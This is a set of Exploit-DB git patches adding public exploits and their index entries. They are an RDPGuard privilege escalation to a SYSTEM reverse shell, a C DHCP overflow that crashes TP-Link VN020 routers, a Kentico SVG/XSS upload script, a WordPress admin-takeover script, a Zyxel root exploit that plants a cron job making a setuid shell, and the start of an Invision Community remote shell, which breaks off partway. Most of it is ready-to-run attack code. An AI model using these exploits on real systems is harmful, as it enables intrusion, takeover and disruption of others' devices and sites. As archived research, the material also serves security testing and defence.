From e49e8d0522fcb8aa215242bc505f75eff62d3b15 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 14 May 2025 00:16:22 +0000 Subject: [PATCH 1/6] DB: 2025-05-14 5 changes to exploits/shellcodes/ghdb RDPGuard 9.9.9 - Privilege Escalation TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation --- exploits/multiple/local/52289.txt | 20 ++ exploits/multiple/local/52292.c | 338 +++++++++++++++++++++++++++++ exploits/multiple/webapps/52290.py | 68 ++++++ exploits/multiple/webapps/52291.py | 71 ++++++ files_exploits.csv | 4 + 5 files changed, 501 insertions(+) create mode 100644 exploits/multiple/local/52289.txt create mode 100644 exploits/multiple/local/52292.c create mode 100755 exploits/multiple/webapps/52290.py create mode 100755 exploits/multiple/webapps/52291.py diff --git a/exploits/multiple/local/52289.txt b/exploits/multiple/local/52289.txt new file mode 100644 index 000000000..3223f7121 --- /dev/null +++ b/exploits/multiple/local/52289.txt @@ -0,0 +1,20 @@ +# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 09.05.2025 +# Vendor Homepage: https://rdpguard.com +# Software Link: https://rdpguard.com/download.aspx +# Tested Version: 9.9.9 (latest) +# Tested on: Windows 10 (32bit) + +# # # Steps to Reproduce # # # + +# 1. Prepare a .bat file containing your reverse shell code. +# 2. Open RDPGuard. +# 3. Navigate to Tools > Custom Actions / Notifications. +# 4. Click the "Add" button. +# 5. Leave "Event" as "IP Blocked". +# 6. Select "Execute Program" from the "Action" dropdown. +# 7. Under the "Program/script" field, select your prepared .bat file. +# 8. Set up your listener. +# 9. Click "Test Run". +# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained! \ No newline at end of file diff --git a/exploits/multiple/local/52292.c b/exploits/multiple/local/52292.c new file mode 100644 index 000000000..9bd0139c1 --- /dev/null +++ b/exploits/multiple/local/52292.c @@ -0,0 +1,338 @@ +/* + * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow + * Date: 10/20/2024 + * Exploit Author: Mohamed Maatallah + * Vendor Homepage: https://www.tp-link.com + * Version: TT_V6.2.1021 (VN020-F3v(T)) + * Tested on: VN020-F3v(T) Router (Hardware Version 1.0) + * CVE: CVE-2024-11237 + * Category: Remote + + * Technical Details: + * ----------------- + * - Triggers multiple memory corruption vectors in DHCP parsing + * - Primary vector: Stack overflow via oversized hostname (127 bytes) + * - Secondary vector: Parser confusion via malformed length fields + * - Tertiary vector: Vendor specific option parsing edge case + * + * Attack Surface: + * -------------- + * - DHCP service running on port 67 + * - Processes broadcast DISCOVER packets + * - No authentication required + * - Affects all routers running VN020 F3v(t) specifically the ones + * supplied by Tunisie Telecom & Topnet + * + * Exploitation Method: + * ------------------ + * 1. Sends crafted DHCP DISCOVER packet + * 2. Overflows hostname buffer (64 -> 127 bytes) + * 3. Corrupts length fields in DHCP options + * 4. Success = No response (service crash) + * + * Build: + * ------ + * Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly. + * + * Usage: + * ------ + * tplink_dhcp.exe + +#define _WINSOCK_DEPRECATED_NO_WARNINGS +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32.lib") + +// Standard DHCP ports - Server listens on 67, clients send from 68 +#define DHCP_SERVER_PORT 67 +#define DHCP_CLIENT_PORT 68 +#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet +#define MAX_ATTEMPTS 3 + +// Forward declarations of functions +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length); +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data); +void tp_link(unsigned char* packet, int* offset); +void print_packet_hex(unsigned char* packet, int length); +int wait_for_response(SOCKET sock, int timeout); + +int main() { + WSADATA wsa; + SOCKET sock; + struct sockaddr_in dest; + unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet + int packet_length = 0; // Length of constructed packet + int attempts = 0; // Counter for send attempts + int success = 0; + + + printf("[TP-Thumper] Initializing Winsock...\n"); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) { + printf("[TP-Thumper] Winsock initialization failed. Error: %d\n", + WSAGetLastError()); + return 1; + } + + sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (sock == INVALID_SOCKET) { + printf("[TP-Thumper] Could not create socket. Error: %d\n", + WSAGetLastError()); + WSACleanup(); + return 1; + } + + // Set up broadcast address (255.255.255.255) + dest.sin_family = AF_INET; + dest.sin_port = htons(DHCP_SERVER_PORT); + dest.sin_addr.s_addr = inet_addr("255.255.255.255"); + + // Enable broadcast mode on socket + BOOL broadcast = TRUE; + if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast, + sizeof(broadcast)) < 0) { + printf("[TP-Thumper] Broadcast mode failed.\n"); + closesocket(sock); + WSACleanup(); + return 1; + } + + srand((unsigned int)time(NULL)); + + // Create the DHCP DISCOVER packet + create_dhcp_discover_packet(packet, &packet_length); + + // Main attempt loop - tries to send packet MAX_ATTEMPTS times + while (attempts < MAX_ATTEMPTS && !success) { + printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n", + attempts + 1, MAX_ATTEMPTS); + print_packet_hex(packet, packet_length); //debug + + // Send the packet + if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest, + sizeof(dest)) < 0) { + printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError()); + } + else { + printf("[TP-Thumper] Packet sent. Waiting for router response...\n"); + if (wait_for_response(sock, 10)) { + printf( + "[TP-Thumper] Router responded! Exploit may not have succeeded.\n"); + success = 1; + } + else { + printf("[TP-Thumper] No response received within timeout.\n"); + } + } + attempts++; + } + if (!success) { + printf( + "[TP-Thumper] Exploit succeeded: No router response after %d " + "attempts.\n", + MAX_ATTEMPTS); + } + else { + printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n"); + } + + // Cleanup + closesocket(sock); + WSACleanup(); + return 0; +} +/* + * DHCP Message Format: + * [0x00]: op = 0x01 ; BOOTREQUEST + * [0x01]: htype = 0x01 ; Ethernet + * [0x02]: hlen = 0x06 ; MAC addr len + * [0x03]: hops = 0x00 ; No relay + * [0x04-0x07]: xid ; Random transaction ID + * [0x08-0x0F]: secs + flags ; Broadcast flags set + * [0x10-0x1F]: ciaddr + yiaddr ; Empty + * [0x20-0x27]: siaddr + giaddr ; Empty + * [0x28-0x2D]: chaddr ; Crafted MAC + */ + +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) { + memset(packet, 0, MAX_PACKET_SIZE); + int offset = 0; + + // DHCP Header - Standard fields + packet[offset++] = 0x01; // BOOTREQUEST + packet[offset++] = 0x01; // Ethernet + packet[offset++] = 0x06; // MAC len + packet[offset++] = 0x00; // No hops + + // ; XID - rand() used for bypass of response filtering + // ; mov eax, rand() + // ; mov [packet + 4], eax + unsigned int xid = (unsigned int)rand(); + *((unsigned int*)&packet[offset]) = htonl(xid); + offset += 4; + + // ; Flags - Set broadcast bit to force response + // ; mov word [packet + 8], 0x0000 ; secs elapsed + // ; mov word [packet + 10], 0x8000 ; broadcast flag + packet[offset++] = 0x00; + packet[offset++] = 0x00; + packet[offset++] = 0x80; + packet[offset++] = 0x00; + + // Zero IP fields - forces DHCP server parse + memset(&packet[offset], 0, 16); + offset += 16; + + // ; Crafted MAC - DE:AD:BE:EF:00:01 + // ; Used for unique client tracking, bypasses MAC filters + packet[offset++] = 0xDE; + packet[offset++] = 0xAD; + packet[offset++] = 0xBE; + packet[offset++] = 0xEF; + packet[offset++] = 0x00; + packet[offset++] = 0x01; + memset(&packet[offset], 0x00, 10); + offset += 10; + + // ; Skip server name/boot filename + // ; Total padding: 192 bytes + memset(&packet[offset], 0x00, 64); + offset += 64; + memset(&packet[offset], 0x00, 128); + offset += 128; + + // ; DHCP Magic Cookie + // ; 0x63825363 = DHCP in natural order + packet[offset++] = 0x63; + packet[offset++] = 0x82; + packet[offset++] = 0x53; + packet[offset++] = 0x63; + + // ; Stack layout after this point: + // ; [ebp+0] = DHCP header + // ; [ebp+240] = DHCP options start + // ; Router parses sequentially from this point + add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 }); + add_option(packet, &offset, 0x37, 4, + (unsigned char[]) { + 0x01, 0x03, 0x06, 0x0F + }); + + // ; Trigger overflow conditions + tp_link(packet, &offset); + + packet[offset++] = 0xFF; // End option + *packet_length = offset; +} + +void tp_link(unsigned char* packet, int* offset) { + // ; Vendor specific overflow - triggers parser state confusion + // ; 0x00,0x14,0x22 = TP-Link vendor prefix + // ; Following 0xFF bytes cause length validation bypass + unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF }; + add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific); + + // ; Stack buffer overflow via hostname + // ; Router allocates 64-byte buffer but we send 127 + // ; Overwrites adjacent stack frame + unsigned char long_hostname[128]; + memset(long_hostname, 'A', sizeof(long_hostname) - 1); + long_hostname[127] = '\0'; + add_option(packet, offset, 0x0C, 127, long_hostname); + + // ; Length field exploit + // ; Claims 255 bytes but only sends 1 + // ; Router assumes full length during memory operations + // ; leads to read/write past buffer + add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 }); +} + +// ; Helper for DHCP option construction +// ; option = option code +// ; length = claimed length (can be falsified) +// ; data = actual payload + +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data) { + packet[(*offset)++] = option; // Option type + packet[(*offset)++] = length; // Claimed length + memcpy(&packet[*offset], data, length); + *offset += length; +} + +// Debug +void print_packet_hex(unsigned char* packet, int length) { + printf("[TP-Thumper] Packet Hex Dump:\n"); + + // Print header fields with labels + printf("Opcode (op): %02X\n", packet[0]); + printf("Hardware Type (htype): %02X\n", packet[1]); + printf("Hardware Address Length (hlen): %02X\n", packet[2]); + printf("Hops: %02X\n", packet[3]); + + // Transaction ID + printf("Transaction ID (xid): "); + for (int i = 4; i < 8; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Flags + printf("Flags: "); + for (int i = 10; i < 12; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Client Hardware Address (MAC) + printf("Client Hardware Address (chaddr): "); + for (int i = 28; i < 34; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Magic Cookie + printf("Magic Cookie: "); + for (int i = 236; i < 240; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Options + printf("DHCP Options:\n"); + int i = 240; + while (i < length) { + printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]); + int option_length = packet[i + 1]; + for (int j = 0; j < option_length; j++) { + printf("%02X ", packet[i + 2 + j]); + } + printf("\n"); + i += 2 + option_length; + if (packet[i] == 0xFF) { + printf(" End of Options\n"); + break; + } + } +} + +// Wait for router response with timeout +int wait_for_response(SOCKET sock, int timeout) { + struct timeval tv; + tv.tv_sec = timeout; + tv.tv_usec = 0; + + // Set up file descriptor set for select() + fd_set readfds; + FD_ZERO(&readfds); + FD_SET(sock, &readfds); + + // Wait for data or timeout + int result = select(0, &readfds, NULL, NULL, &tv); + return result > 0; // Returns true if data available +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52290.py b/exploits/multiple/webapps/52290.py new file mode 100755 index 000000000..81fea1eb5 --- /dev/null +++ b/exploits/multiple/webapps/52290.py @@ -0,0 +1,68 @@ +# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) +# Date: 2025-05-09 +# Version: Kentico Xperience before 13.0.178 +# Exploit Author: Alex Messham +# Contact: ramessham@gmail.com +# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/ +# CVE: CVE-2025-32370 + +import requests +import subprocess +import os +import argparse + +def create_svg_payload(svg_filename: str): + print(f"[*] Writing malicious SVG to: {svg_filename}") + svg_payload = ''' + + + + + +''' + with open(svg_filename, 'w') as f: + f.write(svg_payload) + +def zip_payload(svg_filename: str, zip_filename: str): + print(f"[*] Creating zip archive: {zip_filename}") + subprocess.run(['zip', zip_filename, svg_filename], check=True) + +def upload_zip(zip_filename: str, target_url: str): + full_url = f"{target_url}?Filename={zip_filename}&Complete=false" + headers = { + "Content-Type": "application/octet-stream" + } + + print(f"[+] Uploading {zip_filename} to {full_url}") + with open(zip_filename, 'rb') as f: + response = requests.post(full_url, headers=headers, data=f, +verify=False) + + if response.status_code == 200: + print("[+] Upload succeeded") + else: + print(f"[-] Upload failed with status code {response.status_code}") + print(response.text) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - +Unauthenticated ZIP file upload with embedded SVG for XSS.") + parser.add_argument("--url", required=True, help="Target upload URL +(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)") + parser.add_argument("--svg", default="poc.svc", help="SVG filename to +embed inside the zip") + parser.add_argument("--zip", default="exploit.zip", help="Name of the +output zip file") + + args = parser.parse_args() + + create_svg_payload(args.svg) + zip_payload(args.svg, args.zip) + upload_zip(args.zip, args.url) +``` \ No newline at end of file diff --git a/exploits/multiple/webapps/52291.py b/exploits/multiple/webapps/52291.py new file mode 100755 index 000000000..8d9408c5c --- /dev/null +++ b/exploits/multiple/webapps/52291.py @@ -0,0 +1,71 @@ +# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation +# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/ +# Date: 2025-05-12 +# Exploit Author: Md Shoriful Islam (RootHarpy) +# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/ +# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip +# Version: <= 1.0.7 +# Tested on: Ubuntu 22.04 + WordPress 6.5.2 +# CVE : CVE-2025-3605 + +import requests +import argparse +import sys + +def display_banner(): + banner = """ + _____ _____ ___ __ ___ ___ ____ __ __ ___ + / __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __| +| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \ + \___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/ + """ + print(banner) + +def suppress_ssl_warnings(): + requests.packages.urllib3.disable_warnings() + +def initialize_session(): + new_session = requests.Session() + new_session.verify = False + new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"}) + return new_session + +def parse_input_args(): + parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7") + parser.add_argument("--target", "-t", required=True, help="Target URL to exploit") + parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)") + parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)") + return parser.parse_args() + +def generate_payload(user, email): + return { + 'action': 'flrblocksusersettingsupdatehandle', + 'user_id': user, + 'flr-blocks-email-update': email + } + +def execute_exploit(session, target_url, payload): + try: + return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload) + except Exception as error: + print(f"Request error: {error}") + sys.exit(1) + +def process_response(response): + if response.status_code == 200 and response.text.strip() != "0": + print(f"Exploit succeeded! Response: {response.text}") + print("Next: Go to the Forgot Password page and reset the admin password using the new email!") + else: + print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}") + +def run_exploit(): + display_banner() + suppress_ssl_warnings() + args = parse_input_args() + session = initialize_session() + payload = generate_payload(args.target_user, args.new_email) + response = execute_exploit(session, args.target, payload) + process_response(response) + +if __name__ == "__main__": + run_exploit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 845f80054..8b57329d3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10568,6 +10568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772 52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,, +52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,, 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,, @@ -10585,6 +10586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,, 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,, +52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,, 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,, @@ -12090,6 +12092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info 36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,, 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,, +52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,, 14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,, 44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,, 50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip, @@ -12494,6 +12497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,, 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011 +52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,, 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip, From 8bc45b368af71018b3b9d493d9a42fb3c8eae8f6 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Mon, 19 May 2025 00:16:30 +0000 Subject: [PATCH 2/6] DB: 2025-05-19 4 changes to exploits/shellcodes/ghdb Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation CrushFTP 11.3.1 - Authentication Bypass Invision Community 5.0.6 - Remote Code Execution (RCE) --- exploits/multiple/local/52293.bash | 131 +++++++ exploits/multiple/remote/52294.php | 56 +++ exploits/multiple/remote/52295.py | 609 +++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 799 insertions(+) create mode 100644 exploits/multiple/local/52293.bash create mode 100644 exploits/multiple/remote/52294.php create mode 100755 exploits/multiple/remote/52295.py diff --git a/exploits/multiple/local/52293.bash b/exploits/multiple/local/52293.bash new file mode 100644 index 000000000..7539e0c35 --- /dev/null +++ b/exploits/multiple/local/52293.bash @@ -0,0 +1,131 @@ +# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation +# Date: 2025-04-23 +# Exploit Author: Marco Ivaldi +# Vendor Homepage: https://www.zyxel.com/ +# Version: Zyxel uOS V1.31 (see +https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= +=3D +advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= +=3D +ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) +# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel +FLEX200H with Firmware V1.31(ABWV.0) +# CVE: CVE-2025-1731 + +#!/bin/sh + +# +# raptor_fermion - Zyxel fermion-wrapper root LPE exploit +# Copyright (c) 2025 Marco Ivaldi +# +# "So we wait, this is our labour... we wait." +# -- Anthony Swofford on fuzzing +# +# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by +# Zyxel with some of their appliances follows symbolic links in the `/tmp` +# directory when run with the `register-status` argument. This allows local +# users with access to a Linux OS shell to trick the program into creating +# writable files at arbitrary locations in the filesystem. This vulnerability +# can be exploited to overwrite arbitrary files or locally escalate privileges +# from low-privileged user (e.g., `postgres`) to root. +# +# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies +# exploitation of this vulnerability and may also cause all sorts of havoc. +# +# ## Vulnerability information +# +# * CVE ID - CVE-2025-1731 +# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H +# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html +# +# ## Relevant links +# +# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt +# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731 +# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732 +# * https://security.humanativaspa.it/tag/zyxel/ +# +# ## Usage example +# +# ``` +# $ ./raptor_fermion +# raptor_fermion - Zyxel fermion-wrapper root LPE exploit +# Copyright (c) 2025 Marco Ivaldi +# +# [*] Exploiting /usr/sbin/fermion-wrapper +# $ uname -a +# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux +# $ id +# uid=502(postgres) gid=502(postgres) groups=502(postgres) +# $ ls -l /usr/sbin/fermion-wrapper +# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper +# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1} +# +# [+] Everything looks good \o/, wait an hour and check /tmp/pwned +# $ ls -l /etc/cron.d/runme +# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme +# $ cat /etc/cron.d/runme +# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme +# +# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p +# +# [about one hour later...] +# +# $ ls -l /tmp/pwned +# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned +# $ /tmp/pwned -p +# # id +# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres) +# # R00t D4nc3!!!111! \o/ +# ``` +# +# ## Tested on +# +# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47 +# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31 +# +# *Note: other products and firmware versions may also be vulnerable.* +# +# ## Special thanks +# +# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices +# + +echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit" +echo "Copyright (c) 2025 Marco Ivaldi " +echo + +target="/usr/sbin/fermion-wrapper" +tmpfile="/tmp/register_status" +runme="/etc/cron.d/runme" +shell="/tmp/pwned" + +echo "[*] Exploiting $target" +echo "$ uname -a" +uname -a +echo "$ id" +id +echo "$ ls -l $target" +ls -l $target + +umask 0 +rm $tmpfile +ln -s $runme /tmp/register_status +$target register-status +echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme + +if [ "`cat $runme 2>/dev/null`" = "" ]; then + echo "[!] Error: something went wrong ¯\\_(ツ)_/¯" + exit 1 +fi + +echo +echo "[+] Everything looks good \\o/, wait an hour and check $shell" +echo "$ ls -l $runme" +ls -l $runme +echo "$ cat $runme" +cat $runme + +echo +echo "[+] Run the shell as follows to bypass bash checks: $shell -p" +echo \ No newline at end of file diff --git a/exploits/multiple/remote/52294.php b/exploits/multiple/remote/52294.php new file mode 100644 index 000000000..4735198ee --- /dev/null +++ b/exploits/multiple/remote/52294.php @@ -0,0 +1,56 @@ +\n"; + print "\nExample....: php $argv[0] http://localhost/invision/"; + print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n"; + die(); +} + +$ch = curl_init(); + +$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"]; + +curl_setopt($ch, CURLOPT_URL, $argv[1]); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); +curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); + +while (1) +{ + print "\ninvision-shell# "; 